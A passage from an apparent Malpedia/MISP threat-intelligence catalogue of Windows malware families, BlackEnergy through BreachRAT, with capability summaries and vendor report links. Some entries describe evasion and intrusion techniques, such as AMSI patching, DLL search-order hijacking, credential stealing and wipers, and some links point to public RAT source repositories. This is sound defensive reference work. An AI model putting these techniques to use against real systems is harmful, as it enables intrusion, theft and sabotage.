https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/

https://www.intrinsec.com/alphv-ransomware-gang-analysis/

https://securelist.com/a-bad-luck-blackcat/106254/

https://blog.group-ib.com/blackcat

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.varonis.com/blog/alphv-blackcat-ransomware

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html

https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://www.mandiant.com/resources/blog/alphv-ransomware-backup

https://github.com/f0wl/blackCatConf

https://www.trellix.com/about/newsroom/stories/research/scattered-spider-the-modus-operandi/

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

BlackEnergy

BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before the Russo-Georgian War.

Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian and Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to:

  • download and execute a remote file;

  • execute a local file on the infected computer;

  • update the bot and its plugins.

The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.

In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:

  • operations with the victim’s filesystem

  • spreading with a parasitic infector

  • spying features like keylogging, screenshots or a robust password stealer

  • TeamViewer and a simple pseudo “remote desktop”

  • listing Windows accounts and scanning the network

  • destroying the system

Typical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.

On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.

The tag is: misp-galaxy:malpedia="BlackEnergy"

BlackEnergy is also known as:

Table 3028. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://attack.mitre.org/groups/G0034

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://marcusedmondson.com/2019/01/18/black-energy-analysis/

https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/

https://securelist.com/black-ddos/36309/

https://www.secureworks.com/research/blackenergy2

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://threatconnect.com/blog/casting-a-light-on-blackenergy/

https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/

http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.secureworks.com/research/threat-profiles/iron-viking

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/

BlackGuard

According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.

The tag is: misp-galaxy:malpedia="BlackGuard"

BlackGuard is also known as:

Table 3029. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard

https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer

https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4

https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/

https://ke-la.com/information-stealers-a-new-landscape/

https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/

https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html

https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5

https://cyberint.com/blog/research/blackguard-stealer/

https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm

https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/

https://www.youtube.com/watch?v=Fd8WjxzY2_g

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data

https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

BlackMagic

Ransomware

The tag is: misp-galaxy:malpedia="BlackMagic"

BlackMagic is also known as:

Table 3032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic

https://blog.cyble.com/2022/12/07/a-closer-look-at-blackmagic-ransomware/

BlackMatter (Windows)

According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay to recover access to their data.

During the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named "1.jpg" would appear as something similar to "1.jpg.k5RO9fVOl". After this process is complete, the ransomware changes the desktop wallpaper and creates a ransom note named "[random_string].README.txt" (e.g., k5RO9fVOl.README.txt).

The tag is: misp-galaxy:malpedia="BlackMatter (Windows)"

BlackMatter (Windows) is also known as:

Table 3033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://www.netskope.com/blog/netskope-threat-coverage-blackmatter

https://us-cert.cisa.gov/ncas/alerts/aa21-291a

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration

https://assets.virustotal.com/reports/2021trends.pdf

https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/

https://blog.minerva-labs.com/blackmatter

https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant—​lockbit-3-.html

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.mandiant.com/resources/cryptography-blackmatter-ransomware

https://www.varonis.com/blog/blackmatter-ransomware/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/

https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/

https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/

https://www.glimps.fr/lockbit3-0/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/

https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf

https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

BlackNET RAT

Advanced and modern Windows botnet with PHP panel developed using VB.NET. It has a lot of functionalities including: stealing/grabbing files and passwords, keylogging, cryptojacking, loading files, executing commands, etc. It is open source and emerged at the end of 2019.

The tag is: misp-galaxy:malpedia="BlackNET RAT"

BlackNET RAT is also known as:

Table 3034. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat

https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware

http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html

https://github.com/mave12/BlackNET-3.7.0.1

https://github.com/BlackHacker511/BlackNET/

https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/

https://github.com/FarisCode511/BlackNET/

https://labs.k7computing.com/?p=21365

BlackNix RAT

The tag is: misp-galaxy:malpedia="BlackNix RAT"

BlackNix RAT is also known as:

Table 3035. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat

https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb

BlackPOS

BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.

The tag is: misp-galaxy:malpedia="BlackPOS"

BlackPOS is also known as:

  • Kaptoxa

  • MMon

  • POSWDS

  • Reedum

Table 3036. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos

https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/

https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf

BlackRevolution

The tag is: misp-galaxy:malpedia="BlackRevolution"

BlackRevolution is also known as:

Table 3038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution

BlackSnake

The tag is: misp-galaxy:malpedia="BlackSnake"

BlackSnake is also known as:

Table 3042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksnake

https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/

BlackSuit (Windows)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

The tag is: misp-galaxy:malpedia="BlackSuit (Windows)"

BlackSuit (Windows) is also known as:

Table 3044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksuit

https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html

https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/

BleachGap

The tag is: misp-galaxy:malpedia="BleachGap"

BleachGap is also known as:

Table 3046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap

https://labs.k7computing.com/index.php/bleachgap-revamped/

BLINDINGCAN

BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S). It uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. It sends information about the victim’s environment, like computer name, IP, Windows product name and processor name. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indices being skipped. It uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc. It contains specific RTTI symbols like ".?AVCHTTP_Protocol@@", ".?AVCFileRW@@" or ".?AVCSinSocket@@". BLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.

The tag is: misp-galaxy:malpedia="BLINDINGCAN"

BLINDINGCAN is also known as:

  • AIRDRY

  • ZetaNile

Table 3047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan

https://www.hvs-consulting.de/lazarus-report/

https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

https://www.cisa.gov/news-events/analysis-reports/ar20-232a

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

Blister

Elastic observed this loader coming with valid code signatures, being used to deploy secondary payloads in-memory.

The tag is: misp-galaxy:malpedia="Blister"

Blister is also known as:

  • COLORFAKE

Table 3049. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blister

https://security-labs.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://redcanary.com/blog/intelligence-insights-january-2022/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/

https://elastic.github.io/security-research/malware/2022/05/02.blister/article/

https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/

https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader

https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/

https://twitter.com/MsftSecIntel/status/1522690116979855360

win.trojan.bloodalchemy

The tag is: misp-galaxy:malpedia="win.trojan.bloodalchemy"

win.trojan.bloodalchemy is also known as:

Table 3050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bloodalchemy

https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor

BlueFox

BlueFox is a .NET infostealer sold on forums as a Malware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, plus file grabber and loader capabilities.

The tag is: misp-galaxy:malpedia="BlueFox"

BlueFox is also known as:

Table 3052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluefox

https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/

BLUEHAZE

Mandiant associates this malware with UNC4191; it is a launcher for NCAT used to establish a reverse tunnel.

The tag is: misp-galaxy:malpedia="BLUEHAZE"

BLUEHAZE is also known as:

Table 3053. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

BLUELIGHT

Malware family used to deliver follow-up payloads; variants using the Microsoft Graph API and Google Web Apps have been observed.

The tag is: misp-galaxy:malpedia="BLUELIGHT"

BLUELIGHT is also known as:

Table 3054. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

BlueNoroff

This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.

The tag is: misp-galaxy:malpedia="BlueNoroff"

BlueNoroff is also known as:

Table 3055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

BlueShell

According to AhnLab, BlueShell is a backdoor malware developed in the Go language, published on GitHub, and it supports Windows, Linux, and Mac operating systems. Currently, the original GitHub repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.

The tag is: misp-galaxy:malpedia="BlueShell"

BlueShell is also known as:

Table 3056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blueshell

https://asec.ahnlab.com/ko/56715/

https://asec.ahnlab.com/en/47455/

https://asec.ahnlab.com/en/56941/

BOATLAUNCH

FIN7 uses this malware as a helper module during intrusion operations. BOATLAUNCH continuously looks for PowerShell processes on infected systems and patches them to bypass the Windows Antimalware Scan Interface (AMSI).

The tag is: misp-galaxy:malpedia="BOATLAUNCH"

BOATLAUNCH is also known as:

Table 3060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch

https://www.mandiant.com/resources/evolution-of-fin7

Bobik

This malware offers remote access capabilities but also has a DDoS module that was used against supporters of Ukraine.

The tag is: misp-galaxy:malpedia="Bobik"

Bobik is also known as:

Table 3062. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik

https://decoded.avast.io/martinchlumecky/bobik/

https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/

Bohmini

The tag is: misp-galaxy:malpedia="Bohmini"

Bohmini is also known as:

Table 3063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini

BOLDMOVE (Windows)

According to Mandiant, this malware family is attributed to actors with a potential Chinese background, and its Linux variant is related to exploitation of Fortinet’s SSL-VPN (CVE-2022-42475).

The tag is: misp-galaxy:malpedia="BOLDMOVE (Windows)"

BOLDMOVE (Windows) is also known as:

Table 3064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove

https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

BookCodes RAT

BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim’s filesystem, basic process management and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x97853646.

BookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.

The tag is: misp-galaxy:malpedia="BookCodes RAT"

BookCodes RAT is also known as:

  • BookCodesTea

Table 3066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat

https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2612&attach_file_id=EpF2612.pdf

https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2452&attach_file_id=EpF2452.pdf

https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf

https://vblocalhost.com/uploads/VB2021-Park.pdf

Book of Eli

This malware, written in .NET, is a classic information stealer. It can collect various kinds of information and can be deployed in different configurations: "The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software." (ESET) This malware has been active since at least 2012.

The tag is: misp-galaxy:malpedia="Book of Eli"

Book of Eli is also known as:

Table 3067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookofeli

https://www.welivesecurity.com/2016/09/22/libya-malware-analysis/

Bookworm

The tag is: misp-galaxy:malpedia="Bookworm"

Bookworm is also known as:

Table 3068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bookworm

https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/

BOOSTWRITE

FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

The tag is: misp-galaxy:malpedia="BOOSTWRITE"

BOOSTWRITE is also known as:

Table 3070. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

BOOTWRECK

BOOTWRECK is a master boot record wiper malware.

The tag is: misp-galaxy:malpedia="BOOTWRECK"

BOOTWRECK is also known as:

  • MBRkiller

Table 3071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck

https://content.fireeye.com/apt/rpt-apt38

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/

Borat RAT

The Borat RAT comes bundled with its components (e.g. binary builder, supporting modules, server certificates). According to Cyble, this malware is a unique combination of RAT, spyware, and ransomware. The bundled supporting modules provide capabilities including keylogging, ransomware, audio/webcam recording, process hollowing, and browser credential/Discord token stealing.

The tag is: misp-galaxy:malpedia="Borat RAT"

Borat RAT is also known as:

Table 3072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boratrat

https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat

https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/

https://www.bleepingcomputer.com/news/security/new-borat-remote-access-malware-is-no-laughing-matter/

BottomLoader

The tag is: misp-galaxy:malpedia="BottomLoader"

BottomLoader is also known as:

Table 3074. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

BoxCaon

According to Check Point Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by the threat actor IndigoZebra.

The tag is: misp-galaxy:malpedia="BoxCaon"

BoxCaon is also known as:

Table 3076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

BRAIN

The tag is: misp-galaxy:malpedia="BRAIN"

BRAIN is also known as:

Table 3078. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brain

https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/

BrbBot

The tag is: misp-galaxy:malpedia="BrbBot"

BrbBot is also known as:

Table 3081. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Brbbot/Brbbot.md

BreachRAT

This is a backdoor which FireEye calls the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb

The tag is: misp-galaxy:malpedia="BreachRAT"

BreachRAT is also known as:

